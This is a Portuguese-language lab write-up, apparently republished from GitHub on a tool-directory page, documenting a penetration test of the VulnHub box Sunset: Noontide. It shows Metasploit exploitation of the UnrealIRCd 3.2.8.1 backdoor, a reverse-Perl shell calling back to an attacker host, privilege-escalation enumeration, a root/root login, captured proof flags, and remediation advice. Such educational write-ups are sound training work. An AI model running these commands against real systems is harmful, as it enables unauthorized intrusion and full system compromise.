Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
sunset-noontide-pentesting — Descrição Avaliação profissional de teste de penetração da máquina Sunset: Noontide do VulnHub, cobrindo reconhecimento, enumeração de serviços, exploração da CVE-2010-2075, pós-exploração, escalonamento de privilégios e comprometimento total do sistema. | Kitploit
Ferramentas/GitHubGitHub/zales2004/sunset-noontide-pentesting
Escalada de PrivilégiosReconhecimentoEscaneamento de PortasAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoSegurança de RedeCTFTestes de Penetração

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Aprendizado e Educação
Red Teaming
Labs e Prática
GitHubzales2004/sunset-noontide-pentesting

sunset-noontide-pentesting

Descrição Avaliação profissional de teste de penetração da máquina Sunset: Noontide do VulnHub, cobrindo reconhecimento, enumeração de serviços, exploração da CVE-2010-2075, pós-exploração, escalonamento de privilégios e comprometimento total do sistema.

Ver Repositório
há 9h 6mAinda não revisado

Sunset: Noontide — Teste de Penetração

Uma avaliação profissional de teste de penetração e walkthrough de CTF da Sunset: Noontide, uma máquina intencionalmente vulnerável da VulnHub.

Este projeto documenta o ciclo de vida completo do teste de penetração, incluindo reconhecimento, enumeração de serviços, pesquisa de vulnerabilidades, exploração, acesso inicial, pós-exploração, escalonamento de privilégios, prova de comprometimento, avaliação de risco, mapeamento MITRE ATT&CK e remediação.

⚠️ Aviso: Esta avaliação foi realizada contra uma máquina intencionalmente vulnerável em um ambiente de laboratório autorizado. As técnicas e comandos documentados aqui destinam-se apenas a sistemas para os quais foi obtida autorização explícita.


🎯 Objetivos

  • Identificar o host alvo
  • Enumerar serviços expostos
  • Identificar software e versões vulneráveis
  • Pesquisar vulnerabilidades aplicáveis
  • Explorar o serviço vulnerável
  • Obter acesso inicial ao shell
  • Realizar enumeração de pós-exploração no Linux
  • Identificar oportunidades de escalonamento de privilégios
  • Obter acesso de nível root
  • Recuperar arquivos de prova de usuário e root
  • Documentar descobertas de segurança
  • Fornecer recomendações de remediação

🖥️ Ambiente de Laboratório

ComponenteDetalhes
AlvoSunset: Noontide
PlataformaVulnHub
IP do Alvo10.106.186.186
Nome do Host do Alvonoontide
SO do AlvoDebian GNU/Linux 10 (Buster)
Arquiteturax86_64
Plataforma do AtacanteKali Linux
IP do Atacante10.106.186.204
Tipo de AvaliaçãoAvaliação de Laboratório Autorizada
Risco GeralCRÍTICO
Resultado da AvaliaçãoComprometimento Total do Sistema

🔐 Cadeia de Ataque

Descoberta do Alvo → Enumeração Nmap → UnrealIRCd 3.2.8.1 Identificado → SearchSploit → CVE-2010-2075 Identificado → Exploração Metasploit → Shell de Comando Remoto → Shell como server → Pós-Exploração Linux → Credencial Root Fraca → su root → UID 0 / Acesso Root → Arquivos de Prova de Usuário e Root


1. Reconhecimento

A descoberta inicial de rede foi realizada para identificar o alvo vulnerável.

O alvo foi finalmente identificado como:

10.106.186.186

Durante o reconhecimento, 10.106.186.142 foi identificado como o gateway padrão, e não como o alvo pretendido.

Isso destaca a importância de identificar corretamente o alvo antes de realizar testes de segurança adicionais, particularmente em uma rede de laboratório em bridge ou compartilhada.


2. Enumeração de Serviços

A detecção de serviço e versão do Nmap foi realizada contra o alvo usando:

nmap -sV 10.106.186.186

O serviço exposto significativo identificado durante a avaliação foi:

6667/tcp open irc UnrealIRCd

Um scan mais detalhado foi então realizado usando:

nmap -sC -sV -Pn -p 6667 10.106.186.186

O serviço foi identificado como:

UnrealIRCd 3.2.8.1

O serviço IRC também reportou:

irc.foonet.com

O serviço UnrealIRCd exposto tornou-se a principal superfície de ataque investigada durante a avaliação.


3. Pesquisa de Vulnerabilidades

O SearchSploit foi usado para investigar vulnerabilidades documentadas publicamente associadas à versão do UnrealIRCd descoberta.

Comando:

searchsploit UnrealIRCd 3.2.8.1

O resultado relevante foi:

UnrealIRCd 3.2.8.1 - Backdoor Command Exec

linux/remote/16922.rb

A vulnerabilidade foi identificada como:

CVE-2010-2075

Vulnerabilidade

Execução de Comando por Backdoor no UnrealIRCd 3.2.8.1

Severidade

Crítica

Tipo de Ataque

Execução Remota de Comandos

Impacto de Segurança

A exploração bem-sucedida do serviço vulnerável permite que um atacante execute comandos remotamente no sistema alvo.


4. Exploração com Metasploit

O serviço IRC vulnerável foi explorado usando o Metasploit Framework.

O módulo selecionado foi:

exploit/unix/irc/unreal_ircd_3281_backdoor

Exemplo de configuração:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 10.106.186.186

As tentativas iniciais de payload não produziram uma sessão utilizável.

Um payload Unix reverse-Perl compatível foi subsequentemente selecionado:

set payload cmd/unix/reverse_perl

set LHOST 10.106.186.204

set LPORT 4444

run

O Metasploit reportou que o alvo parecia vulnerável e abriu com sucesso uma sessão de shell de comando.


5. Acesso Inicial

O shell obtido foi verificado usando:

whoami

Resultado:

server

Isso confirmou a execução remota de comandos bem-sucedida como a conta server.

O diretório de trabalho inicial era:

/home/server/irc/Unreal3.2

Neste estágio, a avaliação progrediu da exploração remota de serviço para a enumeração local de pós-exploração.


6. Enumeração de Pós-Exploração

Após obter o shell, a enumeração padrão do Linux foi realizada para entender o host comprometido e identificar possíveis caminhos de escalonamento de privilégios.

Usuário Atual

Comando:

id

Resultado:

uid=1000(server) gid=1000(server)

A conta era um usuário não-root.

Nome do Host

Comando:

hostname

Resultado:

noontide

Informações do Kernel

Comando:

uname -a

Resultado:

Linux noontide 4.19.0-10-amd64 x86_64

Sistema Operacional

Comando:

cat /etc/os-release

Resultado:

Debian GNU/Linux 10 (buster)

Esses comandos estabeleceram a identidade atual, nome do host, versão do kernel, sistema operacional e configuração geral do sistema.


7. Enumeração de Escalonamento de Privilégios

Várias verificações padrão de escalonamento de privilégios no Linux foram realizadas.

7.1 Enumeração de SUID

Comando:

find / -perm -4000 -type f 2>/dev/null

Binários SUID padrão como passwd, chsh, mount, umount, su, chfn, newgrp e gpasswd foram identificados.

Nenhum binário SUID personalizado ou anômalo óbvio foi identificado como o vetor de escalonamento bem-sucedido.


7.2 Enumeração de Sudo

Comando:

sudo -l

Nenhum caminho útil de escalonamento de privilégios baseado em sudo foi identificado a partir da saída disponível.


7.3 Enumeração de Cron

Comandos:

cat /etc/crontab

ls -la /etc/cron.d/

ls -la /etc/cron.hourly/

ls -la /etc/cron.daily/

ls -la /etc/cron.weekly/

Os trabalhos agendados observados eram trabalhos de sistema padrão no estilo Debian.

Nenhum trabalho cron de root gravável óbvio foi identificado.


7.4 Enumeração de Arquivos Graváveis

Comando:

find / -writable -type f 2>/dev/null | head -100

Os resultados iniciais eram principalmente pseudo-arquivos /proc e não revelaram um vetor prático de escalonamento de privilégios.


7.5 Capacidades do Linux

Comando:

getcap -r / 2>/dev/null

Nenhum escalonamento de privilégios útil baseado em capacidades foi identificado a partir da saída resultante.


8. Escalonamento de Privilégios

O caminho bem-sucedido de escalonamento de privilégios foi baseado nas credenciais de root intencionalmente fracas configuradas na máquina vulnerável.

A conta root foi acessada usando:

su root

Senha:

root

O acesso root foi então verificado usando:

id

Resultado:

uid=0(root) gid=0(root) groups=0(root)

A identidade também foi confirmada usando:

whoami

Resultado:

root

Isso confirmou o controle administrativo completo do sistema alvo.


9. Prova de Comprometimento

9.1 Prova em Nível de Usuário

O arquivo de prova em nível de usuário estava localizado em:

/home/server/local.txt

Comando:

cat /home/server/local.txt

Resultado:

c53c08b5bf2b0801c5d0c24149826a6e


9.2 Prova em Nível de Root

O arquivo de prova em nível de root estava localizado em:

/root/proof.txt

Comando:

cat /root/proof.txt

Resultado:

ab28c8ca8da1b9ffc2d702ac54221105

A prova de root também retornou:

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

A recuperação de ambos os arquivos de prova confirma o comprometimento bem-sucedido desde o acesso remoto inicial até o controle em nível de root.


10. Resumo de Riscos

IDDescobertaSeveridadeImpacto
VULN-01Backdoor no UnrealIRCd 3.2.8.1🔴 CríticaExecução Remota de Comandos
VULN-02Credenciais Root Fracas🔴 CríticaComprometimento Administrativo Completo

11. Descobertas Detalhadas

VULN-01 — Backdoor no UnrealIRCd 3.2.8.1

Severidade: Crítica

Serviço Afetado: IRC / TCP 6667

Software Afetado: UnrealIRCd 3.2.8.1

CVE: CVE-2010-2075

Tipo de Ataque: Execução Remota de Comandos

Impacto Observado: Shell remoto obtido como server

Descrição

O serviço UnrealIRCd exposto estava executando uma versão vulnerável associada a uma vulnerabilidade conhecida de execução de comandos por backdoor.

A vulnerabilidade foi identificada através da enumeração de serviços e pesquisa no SearchSploit e foi explorada com sucesso usando o Metasploit.

Impacto nos Negócios

Um atacante capaz de alcançar o serviço IRC vulnerável poderia executar comandos remotamente e obter acesso não autorizado ao host.


VULN-02 — Credenciais Root Fracas

Severidade: Crítica

Conta Afetada: root

Credencial Observada: root / root

Impacto Observado: Acesso administrativo UID 0

Descrição

A conta root foi configurada com uma credencial extremamente fraca.

Após obter um shell local como server, a conta root foi acessada usando a credencial fraca e verificada com UID 0.

Impacto nos Negócios

Um atacante que obtém acesso local ao shell pode usar a credencial root fraca para obter controle completo do sistema operacional.


12. Mapeamento MITRE ATT&CK


13. Recomendações de Remediação

13.1 Remover ou Atualizar o UnrealIRCd

Substitua a instalação vulnerável do UnrealIRCd por uma versão confiável e suportada.

Verifique a integridade do software e a procedência do pacote antes da implantação.

13.2 Remover Software com Backdoor

Se a integridade ou procedência do software for incerta, reconstrua o sistema usando mídia de instalação confiável e pacotes verificados.

13.3 Eliminar Credenciais Fracas

Substitua credenciais padrão e fracas por credenciais administrativas fortes e exclusivas.

Não use senhas simples como root.

13.4 Restringir a Exposição do IRC

Se o IRC for necessário, restrinja o acesso usando:

  • Regras de firewall
  • Segmentação de rede
  • Acesso via VPN
  • Restrições de IP de origem

13.5 Aplicar Atualizações de Segurança

Mantenha um processo documentado de gerenciamento de patches para o sistema operacional e todos os serviços expostos.

13.6 Monitorar Acesso Privilegiado

Registre e revise:

  • Autenticação administrativa
  • Acesso root
  • Alterações de privilégios
  • Atividade de autenticação suspeita

14. Metodologia de Teste de Penetração


15. Ferramentas Utilizadas

  • Nmap — Descoberta de rede e enumeração de serviços
  • SearchSploit — Pesquisa de vulnerabilidades e exploits
  • Metasploit Framework — Exploração e estabelecimento de sessão
  • Utilitários de Linha de Comando do Linux — Pós-exploração e enumeração de privilégios

16. Habilidades Demonstradas

  • Reconhecimento de Rede
  • Descoberta de Host
  • Varredura de Portas
  • Enumeração de Serviços
  • Identificação de Versão
  • Avaliação de Vulnerabilidades
  • Pesquisa de CVE
  • SearchSploit
  • Metasploit Framework
  • Execução Remota de Comandos
  • Enumeração Linux
  • Enumeração de SUID
  • Enumeração de Sudo
  • Enumeração de Cron
  • Enumeração de Arquivos Graváveis
  • Capacidades do Linux
  • Avaliação de Segurança de Credenciais
  • Escalonamento de Privilégios
  • Prova de Comprometimento
  • Mapeamento MITRE ATT&CK
  • Avaliação de Risco
  • Relatório de Segurança
  • Análise de Remediação

17. Avaliação Final

O host Sunset: Noontide foi comprometido com sucesso desde o acesso inicial à rede até o controle completo em nível de root.

A principal vulnerabilidade de acesso inicial foi o backdoor do UnrealIRCd 3.2.8.1 (CVE-2010-2075).

A vulnerabilidade proporcionou execução remota de comandos e resultou em um shell inicial como a conta server.

A enumeração de pós-exploração foi então realizada, incluindo verificações de SUID, sudo, cron, arquivos graváveis, capacidades do Linux, identidade, sistema operacional e sistema de arquivos.

Essas verificações não identificaram a rota de escalonamento bem-sucedida.

O acesso administrativo completo foi finalmente alcançado através das credenciais root fracas da máquina.

A recuperação bem-sucedida de ambos os arquivos de prova em nível de usuário e de root confirmou o comprometimento total do sistema.

Avaliação Geral

CRÍTICO — Comprometimento Total do Sistema Alcançado


18. Resultados da Avaliação


19. Relatório Profissional de Teste de Penetração

Um relatório profissional detalhado de teste de penetração está incluído neste projeto:

Sunset-Noontide-Penetration-Testing-Report.pdf

O relatório contém:

  • Resumo Executivo
  • Controle de Documento
  • Escopo e Regras de Engajamento
  • Resumo de Riscos
  • Caminho de Ataque
  • Reconhecimento
  • Enumeração de Serviços
  • Pesquisa de Vulnerabilidades
  • Exploração com Metasploit
  • Acesso Inicial
  • Pós-Exploração
  • Escalonamento de Privilégios
  • Evidências e Arquivos de Prova
  • Descobertas Detalhadas
  • Mapeamento MITRE ATT&CK
  • Recomendações de Remediação
  • Avaliação Final

20. Evidências

Estrutura sugerida do repositório:

sunset-noontide-pentesting/

├── README.md

├── Sunset-Noontide-Penetration-Testing-Report.pdf

└── evidence/

├── 01-target-discovery.png

├── 02-nmap-enumeration.png

├── 03-searchsploit.png

├── 04-metasploit-exploitation.png

├── 05-initial-shell.png

├── 06-post-exploitation.png

├── 07-privilege-escalation.png

└── 08-root-proof.png

As capturas de tela devem conter apenas informações do ambiente de laboratório autorizado.


21. Lições Aprendidas

Esta avaliação proporcionou experiência prática em:

  1. Identificar corretamente o alvo pretendido em um ambiente de rede.
  2. Realizar enumeração de serviços e versões com Nmap.
  3. Pesquisar vulnerabilidades usando SearchSploit.
  4. Selecionar um módulo de exploit Metasploit apropriado.
  5. Solucionar problemas de compatibilidade de payload.
  6. Estabelecer um shell de comando remoto.
  7. Realizar enumeração de pós-exploração no Linux.
  8. Verificar sistematicamente vetores comuns de escalonamento de privilégios.
  9. Identificar credenciais administrativas fracas.
  10. Verificar comprometimento em nível de root.
  11. Coletar evidências de prova de comprometimento.
  12. Documentar vulnerabilidades em um formato profissional de teste de penetração.

22. ⚠️ Aviso Legal e Ético

Este repositório destina-se estritamente a:

  • Educação em cibersegurança
  • Teste de penetração autorizado
  • Prática de CTF
  • Pesquisa de vulnerabilidades
  • Ambientes de laboratório

As técnicas documentadas neste repositório devem ser realizadas apenas contra sistemas para os quais foi obtida autorização explícita.

Não use essas técnicas contra sistemas de produção, infraestrutura pública ou sistemas de terceiros sem permissão.


👨‍💻 Autor

Alen Sales K S

Cybersecurity | Penetration Testing | SOC | Network Security

GitHub: https://github.com/zales2004


⭐ Resumo do Projeto

Sunset: Noontide demonstra um fluxo de trabalho completo de teste de penetração:

Reconhecimento → Enumeração → Pesquisa de Vulnerabilidades → Exploração → Acesso Inicial → Pós-Exploração → Escalonamento de Privilégios → Acesso Root → Coleta de Evidências → Avaliação de Risco → Relatório de Segurança

Resultado da Avaliação: CRÍTICO — Comprometimento Total do Sistema Alcançado

Baixar ferramenta
TécnicaIDAtividade Observada
Network Service ScanningT1046Enumeração Nmap
Exploit Public-Facing ApplicationT1190Exploração do serviço UnrealIRCd exposto
Command and Scripting InterpreterT1059Shell de comando remoto
Valid AccountsT1078Uso de credenciais root
Account DiscoveryT1087Enumeração de identidade e usuários
System Information DiscoveryT1082uname e /etc/os-release
File and Directory DiscoveryT1083Enumeração do sistema de arquivos
Scheduled Task/Job DiscoveryT1053Enumeração de cron
Permission Groups DiscoveryT1069id e enumeração de grupos
FaseAtividades
ReconhecimentoDescoberta de rede e identificação do alvo
EnumeraçãoDetecção de serviço/versão com Nmap
Pesquisa de VulnerabilidadesIdentificação de módulos SearchSploit e Metasploit
ExploraçãoExploração do backdoor do UnrealIRCd
Acesso InicialShell de comando como server
Pós-ExploraçãoEnumeração de identidade, SO, sistema de arquivos e privilégios
Escalonamento de PrivilégiosVerificações de SUID, sudo, cron, arquivos graváveis e capacidades
Coleta de EvidênciasArquivos de prova de usuário e root
RelatórioDescobertas, análise de risco e remediação
ObjetivoStatus
Alvo Identificado✅ PASS
Serviço Exposto Identificado✅ PASS
Versão Vulnerável Identificada✅ PASS
CVE Identificado✅ PASS
Execução Remota de Comandos✅ PASS
Shell Inicial como server✅ PASS
Prova de Usuário Recuperada✅ PASS
Escalonamento de Privilégios✅ PASS
Acesso Root Verificado✅ PASS
Prova de Root Recuperada✅ PASS